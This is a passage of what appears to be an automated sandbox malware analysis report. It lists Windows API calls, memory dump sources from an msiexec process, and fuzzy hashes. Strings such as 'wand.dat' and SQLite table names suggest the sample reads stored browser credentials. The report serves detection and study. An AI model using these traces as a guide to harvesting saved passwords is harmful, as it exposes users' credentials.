• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
• memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
• memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• virtual tables may not be altered, xrefs: 0042EBD2
• Cannot add a column to a view, xrefs: 0042EBE8
• sqlite_altertab_%s, xrefs: 0042EC4C
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• wcslen.MSVCRT ref: 00410C74
• _wtoi.MSVCRT(?), ref: 00410C80
• _wcsicmp.MSVCRT ref: 00410CCE
• _wcsicmp.MSVCRT ref: 00410CDF
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
                                                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
APIs
• free.MSVCRT ref: 0040F561
• memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
• memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$free
• String ID: g4@
• API String ID: 2888793982-2133833424
• Opcode ID (Opcode Fuzzy Hash): 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
• Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
• Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
APIs
• memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
• memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
• memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID (Opcode Fuzzy Hash): 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
• Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
• Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
• memset.MSVCRT ref: 0040AF18
• memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
• ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID: (none)
• API String ID: 1865533344-0
• Opcode ID (Opcode Fuzzy Hash): 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
• Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
• Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
APIs
• memset.MSVCRT ref: 004144E7
  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
• memset.MSVCRT ref: 0041451A
• GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID: (none)
• API String ID: 1127616056-0
• Opcode ID (Opcode Fuzzy Hash): 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
• Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
• Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
APIs
• memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
• memset.MSVCRT ref: 0042FED3
• memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: sqlite_master
• API String ID: 438689982-3163232059
• Opcode ID (Opcode Fuzzy Hash): ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
• Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
• Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
APIs
• SHGetMalloc.SHELL32(?), ref: 00414D9A
• SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
• wcscpy.MSVCRT ref: 00414DF3
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: BrowseFolderFromListMallocPathwcscpy
• String ID: (none)
• API String ID: 3917621476-0
• Opcode ID (Opcode Fuzzy Hash): d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
• Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
• Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
APIs
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
• _snwprintf.MSVCRT ref: 00410FE1
• SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• _snwprintf.MSVCRT ref: 0041100C
• wcscat.MSVCRT ref: 0041101F
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID: (none)
• API String ID: 822687973-0
• Opcode ID (Opcode Fuzzy Hash): 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
• Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
• Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
• malloc.MSVCRT ref: 00417459
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
• free.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID: (none)
• API String ID: 2605342592-0
• Opcode ID (Opcode Fuzzy Hash): 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
• Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
• Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00412403
• RegisterClassW.USER32(?), ref: 00412428
• GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID: (none)
• API String ID: 2678498856-0
• Opcode ID (Opcode Fuzzy Hash): ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
• Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
• Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Item
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3888421826-0
                                                                                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3727323765-0
                                                                                                                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$CloseHandle
                                                                                                                                                • String ID: General
                                                                                                                                                • API String ID: 3722638380-26480598
                                                                                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
